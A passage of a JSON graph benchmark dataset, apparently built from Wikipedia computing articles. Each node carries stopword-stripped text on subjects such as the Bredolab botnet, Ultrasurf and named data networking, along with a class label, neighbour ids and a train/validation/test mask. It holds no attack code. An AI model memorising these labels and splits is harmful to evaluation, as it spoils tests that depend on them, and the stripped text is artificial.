codice_1 would possible construct type incorrect using gadt well-formed analogue codice_2 type codice_3 codice_4 inferred type codice_5 data constructor",
    "neighbors": [
      4101,
      5783,
      11674,
      4769,
      10145,
      3876,
      5796,
      4134,
      4392,
      11574,
      8251,
      6332,
      6087,
      3926,
      7386,
      8924,
      5213,
      6239,
      3702,
      10102,
      11641,
      9466,
      2556
    ],
    "mask": "None"
  },
  {
    "node_id": 5886,
    "label": 4,
    "text": "Bredolab_botnet:bredolab botnet bredolab botnet also known alias oficla russian botnet mostly involved viral e-mail spam botnet eventually dismantled november 2010 seizure command control servers estimated consist millions zombie computers though earliest reports surrounding bredolab botnet originate may 2009 first malware samples bredolab trojan horse found botnet rise prominence august 2009 major surge size botnet bredonet main form propagation sending malicious e-mails included malware attachments would infect computer opened effectively turning computer another zombie controlled botnet peak botnet capable sending 3.6 billion infected emails every day main form propagation use drive-by downloads method exploits security vulnerabilities software method allowed botnet bypass software protection order facilitate downloads without user aware main income botnet generated leasing parts botnet third parties could subsequently use infected systems purposes security researchers estimate owner botnet made 139,000 month botnet related activities due rental business strategy payload bredolab diverse ranged scareware malware e-mail spam 25 october 2010 team dutch law enforcement agents seized control 143 servers contained three command control servers one database server several management servers bredolab botnet datacenter leaseweb effectively removing botnet herder ability control botnet centrally attempt regain control botnet botnet herder utilized 220,000 computers still control unleash ddos attack leaseweb servers though attempts ultimately vain taking control botnet law enforcement team utilized botnet send message owners infected computers stating computer part botnet subsequently armenian law enforcement officers arrested armenian citizen georgy avanesov basis suspected mastermind behind botnet suspect denied involvement botnet sentenced four years prison may 2012 seizure command control servers severely disrupted botnet ability operate botnet still partially intact command control servers persisting russia kazakhstan security firm fireeye believes secondary group botnet herders taken remaining part botnet purposes possibly previous client reverse engineered parts original botnet creator code even group noted botnet size capacity severely reduced law enforcement intervention",
    "neighbors": [
      3072,
      5636,
      10756,
      3724,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      5563,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3555,
      3941,
      10477,
      4462,
      3320,
      2041,
      10875,
      3581,
      9087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5887,
    "label": 5,
    "text": "Ultrasurf:ultrasurf ultrasurf freeware internet censorship circumvention product created ultrareach internet corporation software bypasses internet censorship firewalls using http proxy server employs encryption protocols privacy software developed chinese dissidents means allowing internet users bypass great firewall china currently boasts many 11 million users worldwide tool described one important free-speech tools internet wired best performing circumvention tool harvard university 2007 study 2011 study freedom house ranked fourth critics open-source community george turner says expressed concern software closed-source nature alleged security obscurity design ultrareach says security considerations mean prefer third party expert review open source review 2001 ultrareach founded chinese dissidents silicon valley shortly ultrasurf created allow internet users china evade government censorship monitoring 2011 ultrasurf reported eleven million users worldwide arab spring ultrareach recorded 700 percent spike traffic tunisia similar traffic spikes occur frequently times unrest regions tibet burma saffron revolution wired magazine 2010 called ultrasurf one important free-speech tools internet enabling citizens access share information oppressed countries times humanitarian human rights crises ultrasurf funded part contracts u.s. government broadcasting board governors administers voice america radio free asia 2012 ultrareach difficulty serving growing user base due insufficient funding ultrasurf free download requires installation ultrasurf install files user computer leaves registry edits exits words leaves trace use fully remove software computer user needs delete exe file named u.exe available windows platform runs internet explorer default optional plug-in firefox chrome ultrareach website notes anti-virus software companies misclassify ultrasurf malware trojan ultrasurf encrypts communications circumvents internet censorship security companies agreed whitelist ultrasurf according applebaum ultrasurf client uses anti-debugging techniques also employs executable compression client acts local proxy communicates ultrareach network appears obfuscated form tls/ssl software works creating encrypted http tunnel user computer central pool proxy servers enabling users bypass firewalls censorship ultrareach hosts servers software makes use sophisticated proprietary anti-blocking technology overcome filtering censorship online according wired magazine ultrasurf changes ip addresses proxy servers 10,000 times hour server-side 2011 analysis found ultrareach network employed squid ziproxy software well isc bind servers bootstrapping wider network open recursive dns servers latter ultrareach control ultrasurf designed primarily anti-censorship tool also offers privacy protections form industry standard encryption added layer obfuscation built ultrareach uses internal content filter blocks sites deemed pornographic otherwise offensive according wired magazine partly network lacks bandwidth accommodate much data-heavy traffic also falun gong frowns erotica additionally falun gong criticism website facts.org.cn alleged operated chinese government also unreachable ultrasurf 2007 study harvard university berkman center internet society found ultrasurf best performing tested circumvention tools in-country tests recommended widespread use particular report found ultrasurf effectively bypassed various forms censorship blocking include ip block dns block keyword filtering also fastest tool in-country tests noted easy use install simple user interface report noted however ultrareach designed primarily circumvention product rather anonymity tool suggested users concerned anonymity disable browser support active content using ultrasurf 2011 report u.s.-based human rights group freedom house ranked ultrasurf fourth overall among censorship circumvention privacy tools measured combination performance usability support security particular tool recommended users interested downloading viewing information required relatively high degree privacy favored fast connection speed technologists expressed reservations ultrareach model however particular developers criticized proponents open-source software allowing peer review tool design except discretion creators moreover ultrareach operates servers developers access user logs architecture means users required trust ultrareach reveal user data ultrareach maintains keeps logs short period time uses purpose analyzing traffic signs interference monitor overall performance efficacy company says disclose user logs third parties according jacob appelbaum tor project essentially amounts example privacy policy april 2012 report appelbaum criticized ultrasurf use internal content filtering including blocking pornographic websites willingness comply subpoenas u.s. law enforcement officials appelbaum report also noted ultrasurf pages employed google analytics potential leak user data systems date latest security patches make use forward security mechanisms furthermore applebaum claims ultrasurf client uses open free software including putty zlib use putty zlib disclosed use lack disclosure violation licenses response posted day ultrareach wrote already resolved issues asserted appelbaum report misrepresented misunderstood aspects software ultrareach also argued differences software approaches internet censorship represented tor ultrasurf base philosophical simply different approaches censorship circumvention top-secret nsa presentation revealed part 2013 global surveillance disclosures dismisses response ultrasurf talk show due restrictions imposed organizations mcafee virusscan flagging ultrasurf versions potentially unwanted program avoiding execution machines ultrasurf virus ultrasurf virus used inappropriately students minors circumvent firewalls measures put place prevent exposure inappropriate and/or indecent content pornography fact runs undetected operating system makes virtually impossible disable block",
    "neighbors": [
      4224,
      5254,
      138,
      6797,
      5524,
      1692,
      9117,
      2721,
      8998,
      3625,
      9771,
      3629,
      7983,
      5811,
      8630,
      8640,
      3777,
      2884,
      3781,
      10442,
      5591,
      2661,
      10341,
      615,
      9193,
      4725,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 5888,
    "label": 9,
    "text": "Metacharacter:metacharacter metacharacter character special meaning computer program shell interpreter regular expression regex engine posix extended regular expressions 14 metacharacters must escaped preceded backslash order drop special meaning treated literally inside expression opening closing square brackets backslash caret dollar sign period/full stop/dot vertical bar/pipe symbol question mark asterisk plus sign opening closing curly brackets/braces opening closing parentheses example match arithmetic expression 1+1 *3=6 regex correct regex 1\\+1\\ \\*3=6 otherwise parentheses plus sign asterisk special meanings characters may special meaning environments term escape metacharacter means make metacharacter ineffective strip special meaning causing literal meaning example pcre dot stands single character regular expression a.c match abc a3c even c however escaped lose meaning metacharacter interpreted literally causing regular expression a\\.c match string a.c usual way escape character regex elsewhere prefixing backslash environments may employ different methods like ms-dos/windows command prompt caret used instead",
    "neighbors": [
      1474,
      963,
      6498,
      8262,
      9735,
      1803,
      10413,
      9166,
      8975,
      3856,
      11442,
      3443,
      7325,
      1277,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 5889,
    "label": 5,
    "text": "Software_Upgrade_Protocol:software upgrade protocol software upgrade protocol sup system set programs developed carnegie mellon university 1980s andrew file system provides collections files maintained identical versions across number machines originally developed mach operating system implementations provided debian ubuntu linux distributions",
    "neighbors": [
      7561,
      3826
    ],
    "mask": "Test"
  },
  {
    "node_id": 5890,
    "label": 5,
    "text": "Named_data_networking:named data networking named data networking ndn related content-centric networking ccn content-based networking data-oriented networking information-centric networking icn proposed future internet architecture inspired years empirical research network usage growing awareness unsolved problems contemporary internet architectures like ip ndn roots earlier project content-centric networking ccn van jacobson first publicly presented 2006 ndn project investigating jacobson proposed evolution today host-centric network architecture ip data-centric network architecture ndn belief conceptually simple shift far-reaching implications people design develop deploy use networks applications premise internet primarily used information distribution network good match ip future internet thin waist based named data rather numerically addressed hosts underlying principle communication network allow user focus data needs named content rather reference specific physical location data retrieved named hosts motivation derived fact vast majority current internet usage high 90 level traffic consists data disseminated source number users named-data networking comes potential wide range benefits content caching reduce congestion improve delivery speed simpler configuration network devices building security network data level today internet hourglass architecture centers universal network layer ip implements minimal functionality necessary global inter-connectivity contemporary internet architecture revolves around host-based conversation model created 1970s allow geographically distributed users use big immobile computers thin waist enabled internet explosive growth allowing lower upper layer technologies innovate independently however ip designed create communication network packets named communication endpoints sustained growth e-commerce digital media social networking smartphone applications led dominant use internet distribution network distribution networks general communication networks solving distribution problems via point-to-point communication protocol complex error-prone named data networking ndn project proposed evolution ip architecture generalizes role thin waist packets name objects communication endpoints specifically ndn changes semantics network service delivering packet given destination address fetching data identified given name name ndn packet name anything – endpoint data chunk movie book command turn lights etc hope conceptually simple change allows ndn networks apply almost internet well-tested engineering properties broader range problems beyond end-to-end communications examples ndn applying lessons learned 30 years networking engineering self-regulation network traffic via flow balance interest data request data packets security primitives via signatures named data integrated protocol start philosophy behind ndn pioneered ted nelson 1979 later brent baccala 2002 1999 triad project stanford proposed avoiding dns lookups using name object route towards close replica 2006 data-oriented network architecture dona project uc berkeley icsi proposed content-centric network architecture improved triad incorporating security authenticity persistence first-class primitives architecture van jacobson gave google talk new way look networking 2006 evolution network argued ndn next step 2009 parc announced content-centric architecture within ccnx project led jacobson time research fellow parc september 21 2009 parc published specifications interoperability released initial open source implementation gpl content-centric networking research project project ccnx site ndn one instance general network research direction called information-centric networking icn different architecture designs emerged internet research task force irtf established icn research working group 2012 ndn includes sixteen nsf-funded principal investigators twelve campuses growing interest academic industrial research communities 30 institutions form global testbed exists large body research actively growing code base contributed ndn ndn forwarder currently supported ubuntu 16.04 18.04 fedora 20+ centos 6+ gentoo linux raspberry pi openwrt freebsd 10+ several platforms common client libraries actively supported c++ java javascript python .net framework c squirrel programming languages ndn simulator emulator also available actively developed several client applications developed areas real-time conferencing ndn friendly file systems chat file sharing iot communication ndn driven receivers i.e. data consumers exchange two types packets interest data types packets carry name identifies piece data transmitted one data packet packet types complete specification see ndn packet format specification carry interest data packet forwarding functions ndn router maintains three data structures forwarding policy interest packet arrives ndn router first checks content store matching data exists router returns data packet interface interest came otherwise router looks name pit matching entry exists simply records incoming interface interest pit entry absence matching pit entry router forward interest toward data producer based information fib well router adaptive forwarding strategy router receives interests name multiple downstream nodes forwards first one upstream toward data producer data packet arrives ndn router finds matching pit entry forwards data down-stream interfaces listed pit entry removes pit entry caches data content store data packets always take reverse path interests absence packet losses one interest packet results one data packet link providing flow balance fetch large content objects comprise multiple packets interests provide similar role controlling traffic flow tcp acks today internet fine-grained feedback loop controlled consumer data neither interest data packets carry host interface addresses routers forward interest packets toward data producers based names carried packets forward data packets consumers based pit state information set interests hop interest/data packet exchange symmetry induces hop-by-hop control loop confused symmetric routing routing eliminates need notion source destination nodes data delivery unlike ip end-to-end packet delivery model ndn names opaque network allows application choose naming scheme fits needs naming thus evolve independently network ndn design assumes hierarchically structured names e.g. video produced ucla may name /ucla/videos/demo.mpg ‘ ’ delineates name components text representations similar urls hierarchical structure many potential benefits retrieve dynamically generated data consumers must able deterministically construct name desired piece data without previously seen name data either current research exploring applications choose names facilitate application development network delivery aim work develop refine existing principles guidelines naming converting rules naming conventions implemented system libraries simplify future application development data may retrieved globally must globally unique names names used local communications may require local routing local broadcast find matching data individual data names meaningful various scopes contexts ranging “ light switch room ” “ country names world ” namespace management part ndn architecture address space management part ip architecture however naming important part ndn application designs enabling application developers sometimes users design namespaces data exchange several benefits ndn routes forwards packets based names eliminates three problems caused addresses ip architecture ndn use conventional routing algorithms link state distance vector instead announcing ip prefixes ndn router announces name prefixes cover data router willing serve conventional routing protocols ospf bgp adapted route name prefixes treating names sequence opaque components component-wise longest prefix match name interest packet fib table enables wide array inputs aggregated real time distributed across multiple interface environments simultaneously without compromising content encryption pit state router supports forwarding across ndn data plane recording pending interest incoming interface removing interest matching data received timeout occurs per hop per packet state differs ip stateless data plane based information fib performance measurements adaptive forwarding strategy module router makes informed decisions router decides interest satisfied e.g. upstream link forwarding entry fib extreme congestion occurs router send nack downstream neighbor transmitted interest negative acknowledgment nack may trigger receiving router forward interest interfaces explore alternate paths pit state enables routers identify discard looping packets allowing freely use multiple paths toward data producer packets loop ndn means need time-to-live measures implemented ip related protocols address issues contrast tcp/ip leaves responsibility security lack thereof endpoints ndn secures data requiring data producers cryptographically sign every data packet publisher signature ensures integrity enables determination data provenance allowing consumer trust data decoupled obtained ndn also supports fine-grained trust allowing consumers reason whether public key owner acceptable publisher specific piece data specific context second primary research thrust designing developing usable mechanisms manage user trust research 2 different types trust models ndn data-centric security natural applications content access control infrastructure security applications encrypt data distribute keys named packets using named infrastructure distribute keys effectively limiting data security perimeter context single application verify data packet signature application fetch appropriate key identified packet key locator field like content trust management i.e. determine authenticity given key particular packet given application primary research challenge consistent experimental approach ndn trust management research driven application development use solving specific problems first identifying common patterns example security needs nlsr required development simple hierarchical trust model keys lower closer root levels used sign keys higher levels keys published names reflect trust relationship trust model namespace matches hierarchy trust delegation i.e. /root/site/operator/ router/process publishing keys particular name hierarchy authorizes sign specific data packets limits scope paradigm easily extended applications real world trust tends follow hierarchical pattern building management systems bms since ndn leaves trust model control application flexible expressive trust relations may also expressed one example chronochat motivated experimentation web-of-trust model security model current chatroom participant introduce newcomer others signing newcomer key future applications implement cross-certifying model sdsi 13 3 provides redundancy verification allowing data key names independent easily accommodates variety real-world trust relationships furthermore ndn treats network routing control messages like ndn data requiring signatures provides solid foundation securing routing protocols attack e.g. spoofing tampering ndn use multipath forwarding together adaptive forwarding strategy module mitigates prefix hijacking routers detect anomalies caused hijacks retrieve data alternate paths since ndn packets reference content rather devices trickier maliciously target particular device although mitigation mechanisms needed ndn-specific attacks e.g. interest flooding dos. furthermore pending interest table keeps state regarding past requests make informed forward decisions handle interest numerous security advantages",
    "neighbors": [
      5472,
      2085,
      3751,
      11122,
      503
    ],
    "mask": "Test"
  },
  {
    "node_id": 5891,
    "label": 4,
    "text": "VIPRE:vipre vipre security also known vipre brand j2 global develops cybersecurity products focused endpoint email security along advanced threat intelligence solutions vipre based clearwater florida operations washington d.c. vancouver b.c. spain uk philippines company originally founded 1994 sunbelt software acquired 2010 gfi software becoming vipre distributed products threattrack security 2017 concentrates vipre suite company uses name vipre portfolio encompasses endpoint security heritage original sunbelt software anti-virus products email security heritage fusemail electric mail products previously acquired j2 2017 vipre earned recognition av-comparatives one six top-rated products av-test virus bulletin february 2018 acquired j2 global recently featured pc world magazine article",
    "neighbors": [
      2049,
      7809,
      131,
      7560,
      1417,
      4374,
      6550,
      1052,
      156,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      10166,
      704,
      9537,
      7362,
      10308,
      4421,
      4677,
      6473,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      9713,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 5892,
    "label": 2,
    "text": "Android_version_history:android version history version history android mobile operating system began public release android beta november 5 2007 first commercial version android 1.0 released september 23 2008 android continually developed google open handset alliance seen number updates base operating system since initial release versions android 1.0 1.1 released specific code names although android 1.1 unofficially known petit four android code names confectionery-themed alphabetical order since 2009 android 1.5 cupcake recent version android android 9 pie released august 2018 development android started 2003 android inc. purchased google 2005 beta released november 5 2007 software development kit sdk released november 12 2007 november 5 date popularly celebrated android birthday public beta versions sdk released following order following tables show release dates key features android operating system updates date listed chronologically official application programming interface api levels main hardware platform android arm architecture armv7 armv8-a architectures formerly also armv5 x86 mips architectures also officially supported later versions android mips support since deprecated support removed ndk r17 unofficial android-x86 project used provide support x86 mips architectures ahead official support 2012 android devices intel processors began appear including phones tablets gaining support 64-bit platforms android first made run 64-bit x86 arm64 since android 5.0 lollipop 64-bit variants platforms supported addition 32-bit variants requirements minimum amount ram devices running android 7.1 depend screen size density type cpu ranging 816mb–1.8gb 64-bit 512mb–1.3gb 32-bit meaning practice 1gb common type display minimum android watch 416mb recommendation android 4.4 least 512 mb ram low ram devices 340 mb required minimum amount include memory dedicated various hardware components baseband processor android 4.4 requires 32-bit armv7 mips x86 architecture processor latter two unofficial ports together opengl es 2.0 compatible graphics processing unit gpu android supports opengl es 1.1 2.0 3.0 3.2 since android 7.0 vulkan version 1.1 available devices applications may explicitly require certain version opengl es suitable gpu hardware required run applications android used require autofocus camera relaxed fixed-focus camera",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      9745,
      7700,
      9244,
      11294,
      10271,
      1578,
      10284,
      5677,
      3633,
      1083,
      7234,
      6212,
      69,
      2630,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      10332,
      8285,
      2658,
      5749,
      8821,
      6263,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      9909,
      9913,
      7359,
      9923,
      196,
      3269,
      3782,
      8907,
      10445,
      2259,
      3795,
      3286,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9964,
      9970,
      3317,
      246,
      7926,
      6904,
      3836,
      2304,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      6477,
      2383,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      8573,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      8609,
      2978,
      10658,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      11693,
      10675,
      4044,
      3533,
      4048,
      2001,
      479,
      10207,
      6632,
      1516,
      5100,
      5613,
      9712,
      9714,
      499,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5893,
    "label": 4,
    "text": "Red_Condor:red condor red condor inc. privately held company offers anti-spam appliances hosted service block e-mail spam spyware viruses company also offers message archiving service provides back-up inbound outbound email messages 2007 red condor introduced vx technology integrates local appliance hosted service technology redirects email appliance hosted service event network failure november 2008 company named dr. thomas steding former ceo pgp corporation president ceo january 2009 red condor received technology year award infoworld magazine april 2010 red condor purchased st. bernard software",
    "neighbors": [
      2118,
      939,
      10392,
      7739,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5894,
    "label": 0,
    "text": "PATR-II:patr-ii patr-ii linguistic formalism used computational linguistics developed stuart m. shieber uses context-free grammar rules feature constraints rules",
    "neighbors": [
      1890,
      2316
    ],
    "mask": "Test"
  },
  {
    "node_id": 5895,
    "label": 2,
    "text": "DasBoot:dasboot dasboot software utility produced subrosasoft.com inc allows user create bootable mac os x usb device mac os x 10.5 earlier freeware product live usb device used diagnostic repair recovery mac os x systems macworld uk editor choice 5 star award creating dasboot device requires steps addition dasboot application user needs bootable cd dvd firewire usb flash drive intel-powered apple computers support booting via usb usb firewire hard drives may also used dasboot works versions mac os x prior 10.6 bootable mac os x cd/dvds included programs drive genius diskwarrior filesalvage copycatx software utilities bootable dvd used mac os x installer disc used lacks libraries required create bootable device default following applications installed dasboot devices also present user applications folder following applications automatically included users add additional applications dasboot device dragging dropping desired application applications area dasboot application users also select deselect included applications simply clicking icon within applications section user selected device 'd like make bootable selected bootable disk copy required libraries information chosen programs include dasboot device clicking single button starts process building required information copying device boot system dasboot device user starts mac 'option sometimes called 'alt key held display startup screen allows select bootable device would like start system select dasboot device system start normal dasboot interface appear system boots allow user select installed application would like run release version 2.0 added support mac os x 10.6 snow leopard along support newer intel macs performance enhancements bug fixes",
    "neighbors": [
      6371,
      9418,
      3371,
      7983,
      6012,
      4637,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 5896,
    "label": 9,
    "text": "Preprocessor:preprocessor computer science preprocessor program processes input data produce output used input another program output said preprocessed form input data often used subsequent programs like compilers amount kind processing done depends nature preprocessor preprocessors capable performing relatively simple textual substitutions macro expansions others power full-fledged programming languages common example computer programming processing performed source code next step compilation computer languages e.g. c pl/i phase translation known preprocessing also include macro processing file inclusion language extensions lexical preprocessors lowest-level preprocessors require lexical analysis operate source text prior parsing performing simple substitution tokenized character sequences tokenized character sequences according user-defined rules typically perform macro substitution textual inclusion files conditional compilation inclusion common example c preprocessor takes lines beginning directives knows nothing underlying language use criticized many features built directly languages example macros replaced aggressive inlining templates includes compile-time imports requires preservation type information object code making feature impossible retrofit language conditional compilation effectively accomplished codice_1 dead code elimination languages however key point remember preprocessor directives start new line lexical preprocessors include general-purpose m4 commonly used cross-platform build systems autoconf gema open source macro processor operates patterns context syntactic preprocessors introduced lisp family languages role transform syntax trees according number user-defined rules programming languages rules written language program compile-time reflection case lisp ocaml languages rely fully external language define transformations xslt preprocessor xml statically typed counterpart cduce syntactic preprocessors typically used customize syntax language extend language adding new primitives embed domain-specific programming language dsl inside general purpose language good example syntax customization existence two different syntaxes objective caml programming language programs may written indifferently using normal syntax revised syntax may pretty-printed either syntax demand similarly number programs written ocaml customize syntax language addition new operators best examples language extension macros found lisp family languages languages simple dynamically typed functional cores standard distributions scheme common lisp permit imperative object-oriented programming well static typing almost features implemented syntactic preprocessing although bears noting macro expansion phase compilation handled compiler lisp still considered form preprocessing since takes place phases compilation one unusual features lisp family languages possibility using macros create internal dsl typically large lisp-based project module may written variety minilanguages one perhaps using sql-based dialect lisp another written dialect specialized guis pretty-printing etc common lisp standard library contains example level syntactic abstraction form loop macro implements algol-like minilanguage describe complex iteration still enabling use standard lisp operators metaocaml preprocessor/language provides similar features external dsls preprocessor takes description semantics language i.e interpreter combining compile-time interpretation code generation turns definition compiler ocaml programming language—and language either bytecode native code preprocessors specific particular data processing task e.g. compiling c language preprocessor may promoted general purpose meaning aimed specific usage programming language intended used wide variety text processing tasks m4 probably well known example general purpose preprocessor although c preprocessor sometimes used non-c specific role examples",
    "neighbors": [
      4481,
      4865,
      5635,
      3462,
      5510,
      10761,
      9997,
      2062,
      10510,
      11023,
      7964,
      1952,
      3624,
      4777,
      8874,
      9385,
      6061,
      4398,
      9389,
      10413,
      3765,
      8502,
      7479,
      10684,
      6718,
      8000,
      2374,
      8262,
      5584,
      479,
      10083,
      10469,
      8188,
      8697,
      9587,
      1780,
      11125,
      502,
      3960,
      3577,
      6778,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5897,
    "label": 9,
    "text": "Sethi–Ullman_algorithm:sethi–ullman algorithm computer science sethi–ullman algorithm algorithm named ravi sethi jeffrey d. ullman inventors translating abstract syntax trees machine code uses registers possible generating code arithmetic expressions compiler decide best way translate expression terms number instructions used well number registers needed evaluate certain subtree especially case free registers scarce order evaluation important length generated code different orderings may lead larger smaller numbers intermediate values spilled memory restored sethi–ullman algorithm also known sethi–ullman numbering fulfills property producing code needs fewest instructions possible well fewest storage references assumption commutativity associativity apply operators used distributive laws i.e formula_1 hold please note algorithm succeeds well neither commutativity associativity hold expressions used therefore arithmetic transformations applied algorithm also take advantage common subexpressions apply directly expressions represented general directed acyclic graphs rather trees simple sethi–ullman algorithm works follows load/store architecture arithmetic expression formula_2 abstract syntax tree looks like continue algorithm need examine arithmetic expression formula_3 i.e look right subtree assignment '= start traversing tree preorder assigning number registers needed evaluate subtree note last summand expression formula_3 constant tree seen need 2 registers compute left subtree '* 1 register compute right subtree nodes c g need registers following reasons tree leaf number registers evaluate either 1 0 depending whether left right subtree since operation add r1 handle right component directly without storing register therefore shall start emit code left subtree first might run situation 2 registers left compute whole expression computed right subtree first needs 1 register would need register hold result right subtree computing left subtree would still need 2 registers therefore needing 3 registers concurrently computing left subtree first needs 2 registers result stored 1 since right subtree needs 1 register compute evaluation expression 2 registers left advanced version sethi–ullman algorithm arithmetic expressions first transformed exploiting algebraic properties operators used",
    "neighbors": [
      1952,
      409,
      7421,
      9911
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5898,
    "label": 3,
    "text": "SGI_IRIS:sgi iris sgi iris series line terminals workstations silicon graphics built 1980s early systems use motorola 68000 family processors originally later models feature early-generation mips processors",
    "neighbors": [
      7234,
      6243,
      5380,
      10051,
      11447,
      6858,
      5356,
      9932,
      7311,
      5523,
      5076,
      3764,
      1398,
      5272,
      221,
      7001,
      8435,
      1149
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5899,
    "label": 6,
    "text": "PEFS:pefs pefs private encrypted file system kernel level stacked cryptographic file system freebsd open source software available bsd license pefs official website pefs.io sources available github",
    "neighbors": [
      8640,
      9281,
      2050,
      7139,
      10631,
      4746,
      8331,
      5749,
      6519,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 5900,
    "label": 8,
    "text": "Wamp.NET:wamp.net wamp.net combination typical wamp/wnmp stacks supports apache nginx current packages include apache nginx php mariadb mysql postgresql mongodb memcache redis downloaded cached installed/uninstalled via instance manager run standalone windows services multiple simultaneous instances supported meaning one could run mariadb mysql simultaneously apache nginx either different ports port across different interfaces sites/vhosts stored database tied specific web server instance allows moved different web server types versions click button creating new site/vhost automatically creates vhost file http https either apache nginx well update windows hosts file ssl certificates automatically generated background using internal ca root certificate automatically added trusted root store give warnings errors browsing site site/vhost use version php without need switching typically case stack implementations",
    "neighbors": [
      865,
      8644,
      3237,
      8683,
      6797,
      7022,
      7347,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 5901,
    "label": 3,
    "text": "LGA_1567:lga 1567 lga 1567 socket ls cpu socket used high-end server segment 1567 protruding pins make contact pads processor supports intel nehalem codenamed beckton xeon 7500 xeon 6500 series processors first released march 2010 6500 series scalable 2 sockets 7500 series scalable 4/8 sockets supporting motherboard later xeon e7 series using westmere-ex architecture reused socket",
    "neighbors": [
      3588,
      3973,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      6339,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      7151,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 5902,
    "label": 4,
    "text": "Anti-Malware_Testing_Standards_Organization:anti-malware testing standards organization anti-malware testing standards organization amtso international non-profit organization set 2008 address perceived need improvement quality relevance objectivity anti-malware testing methodologies according amtso web site organization charter lists following objectives 2012 amtso administered elected unpaid board directors strategic input advisory board six committees handle specific operations membership fees pr subsequently major infrastructural change took place introducing executive team ceo cto cfo vps marketing strategy addition already existing board grew discussions security vendors security product testing organizations membership amtso also open academics reviewers publications include individual members however high cost full membership generally discourages individual members small organizations joining early 2011 organization offered much cheaper subscription rate n't however offer full voting rights amtso currently offers two-tier membership model entity members get full benefits membership individual members get benefits apart right vote members wider security community even testers raised issue organization membership includes preponderance security vendors organization created potentially useful resources testers including page flags relevant papers resources outside amtso repository guidelines documents benefit aspiring testers wide range topics another popular freely available resource security features check attempts download faux malicious file desktop android device simple test ensure basic anti-malware standards implemented test device also organizes workshops three times year discussion generation guidelines documents major by-product sessions",
    "neighbors": [
      37,
      2213,
      10278,
      43,
      5586,
      665,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 5903,
    "label": 0,
    "text": "VerbNet:verbnet verbnet project maps propbank verb types corresponding levin classes lexical resource incorporates semantic syntactic information contents verbnet part semlink project development university colorado",
    "neighbors": [
      1890,
      5667,
      3721,
      9577,
      4971,
      396,
      10160,
      1460,
      5214
    ],
    "mask": "None"
  },
  {
    "node_id": 5904,
    "label": 2,
    "text": "Binary_Application_Markup_Language:binary application markup language binary application markup language file format microsoft generated compiling xaml files xaml file compiled binary application markup language file .baml extension may inserted resource .net framework assembly run-time framework engine extracts .baml file assembly resources parses creates corresponding wpf visual tree workflow format content loadable faster runtime xaml enriched tokens lexical analysis completed",
    "neighbors": [
      2432,
      1347,
      1348,
      5635,
      113,
      3573,
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 5905,
    "label": 7,
    "text": "T-Systems:t-systems t-systems german global services consulting company headquartered frankfurt founded 2000 subsidiary deutsche telekom 2012 t-systems largest german one largest european services companies serving customers westlb old mutual daimler volkswagen royal dutch shell sanlam murray roberts bp tui ag de agostini philips man se airbus e.on british american tobacco company operates 20 countries 2015 employed 45,990 people 2003 approximately 50,000 people worldwide among around 27,000 germany 23,000 outside beginning december 2007 reinhard clemens ceo president eds hp enterprise services germany since 2003 since january 2018 adel al-saleh ceo t-systems june 2018 t-systems announced cut 10,000 jobs 3 years including 6,000 germany hope returning company profitability t-systems founded 2000 deutsche telekom acquired 50.1 stake debis systemhaus one largest services companies germany time deutsche telekom existing service businesses merged incorporated control one single company newly founded t-systems 2001 t-system headquarters moved bonn frankfurt 2002 remaining 49.9 share debis systemhaus acquired fully incorporated t-systems however company underwent leadership crisis first years creation due different agendas former debis management leadership former telekom subsidiaries since t-systems made number acquisitions notably purchase subsidiary volkswagen group december 2005 2007 2018 t-systems ceo t-systems also supported creation silicon saxony major cluster germany 2008 t-systems global services provider cognizant entered global alliance t-systems india operations taken cognizant following alliance late march 2008 t-systems also working german government market leader germany 2009 t-systems came another wing india t-systems ict india pvt ltd. support global partners t-systems ict india head office pune set another 'point production bangalore april 2016 expanding provide ict services also global customers t-systems international since september 2016 laszlo posset managing director t-systems ict india vivek krishnatray managed company indian operations t-systems different international subsidiaries",
    "neighbors": [
      9104,
      9137,
      9394,
      8355
    ],
    "mask": "None"
  },
  {
    "node_id": 5906,
    "label": 5,
